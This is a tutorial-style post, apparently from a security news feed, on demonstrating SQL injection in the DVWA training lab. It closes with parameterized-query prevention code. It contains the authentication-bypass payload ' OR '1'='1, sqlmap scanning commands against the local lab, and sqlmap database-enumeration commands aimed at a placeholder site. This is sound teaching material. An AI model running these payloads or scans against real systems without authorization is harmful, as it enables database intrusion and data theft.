SQL Injection Demonstration – Summary

1️⃣ Set Up DVWA – Deploy the vulnerable web application and log in.
2️⃣ Set Security Level to Low – Adjust security settings to make SQL injection possible.
3️⃣ Perform SQL Injection – Enter a malicious SQL payload in the login field to bypass authentication.
4️⃣ Automate with SQLMap – Use an automated tool to scan for and exploit SQL injection vulnerabilities.
5️⃣ Conclusion – SQL injection occurs due to poor input validation. Prevent it with secure coding practices like parameterized queries.

You Should Know:

1. Setting Up DVWA (Damn Vulnerable Web Application):

  • Download and install DVWA on your local machine or server.
  • Use the following commands to set up DVWA on a Linux system:
    git clone https://github.com/digininja/DVWA.git
    cd DVWA
    sudo apt-get install apache2 mysql-server php libapache2-mod-php php-mysql
    sudo cp config/config.inc.php.dist config/config.inc.php
    sudo service apache2 restart
    sudo service mysql restart
    
  • Access DVWA via your browser: `http://localhost/DVWA`.

2. Setting Security Level to Low:

  • Log in to DVWA with the default credentials (admin/password).
  • Navigate to `DVWA Security` and set the security level to low.

3. Performing SQL Injection:

  • Go to the `SQL Injection` section in DVWA.
  • Enter the following payload in the input field to bypass authentication:
    ' OR '1'='1
    
  • This payload exploits poor input validation to gain unauthorized access.

4. Automating with SQLMap:

  • Use SQLMap to automate the detection and exploitation of SQL injection vulnerabilities.
  • Run the following command to scan for vulnerabilities:
    sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id"
    
  • SQLMap will identify and exploit the vulnerability, providing detailed results.

5. Preventing SQL Injection:

  • Use parameterized queries or prepared statements in your code.
  • Example in Python with MySQL:
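    import mysql.connector

    # Connect to the local DVWA database (lab credentials)
    db = mysql.connector.connect(
        host="localhost",
        user="root",
        password="",
        database="dvwa",
    )

    # Value received from the user, e.g. the id request parameter
    user_input = "1"

    cursor = db.cursor()
    # %s is a placeholder: the driver sends user_input as data, not as SQL text.
    # DVWA's users table names its key column user_id.
    query = "SELECT * FROM users WHERE user_id = %s"
    cursor.execute(query, (user_input,))
    rows = cursor.fetchall()

  • Always validate and sanitize user inputs.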
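
To show why the placeholder matters, the following added example (not part of the original post) runs the payload from step 3 against a concatenated query and a parameterized one. It assumes an in-memory SQLite table with constructed rows in place of DVWA's MySQL database, so the placeholder is `?` rather than `%s`; the function names are hypothetical.

```python
import sqlite3

PAYLOAD = "' OR '1'='1"  # the payload from step 3


def make_db():
    """Constructed stand-in for DVWA's users table (sample rows, not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1", "admin", "admin"), ("2", "Gordon", "Brown"), ("3", "Pablo", "Picasso")],
    )
    return db


def lookup_vulnerable(db, user_id):
    """String concatenation: the input becomes part of the SQL text."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(query).fetchall()


def lookup_parameterized(db, user_id):
    """Placeholder binding: the input is passed as data and never parsed as SQL."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_id,)).fetchall()


def validate_user_id(user_id):
    """Allow-list validation as a second layer: IDs are 1 to 10 ASCII digits."""
    return user_id.isascii() and user_id.isdigit() and len(user_id) <= 10


if __name__ == "__main__":
    db = make_db()
    for value in ("1", PAYLOAD):
        print(repr(value))
        print("  concatenated     :", lookup_vulnerable(db, value))
        print("  parameterized    :", lookup_parameterized(db, value))
        print("  passes validation:", validate_user_id(value))
```

With the payload, the concatenated query's WHERE clause becomes always true and every row comes back, while the parameterized query looks for a user whose ID is literally the payload string and returns nothing.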

What Undercode Say:

SQL injection remains one of the most critical vulnerabilities in web applications. By understanding how it works and practicing secure coding techniques, you can significantly reduce the risk of exploitation. Tools like SQLMap are invaluable for penetration testers, but prevention is always better than cure. Always use parameterized queries, validate inputs, and keep your software updated to stay ahead of potential threats.

Practice Commands:

  • Linux:
    sudo apt-get install sqlmap
    sqlmap -u "http://example.com/page?id=1" --dbs

  • Windows (with Python installed):
    pip install sqlmap
    sqlmap -u "http://example.com/page?id=1" --dbs

  • MySQL:
    SELECT * FROM users WHERE username = 'admin' AND password = 'password' OR '1'='1';

Stay secure and keep learning!

    References:

    Reported By: Sarah Onyeoziri – Hackers Feeds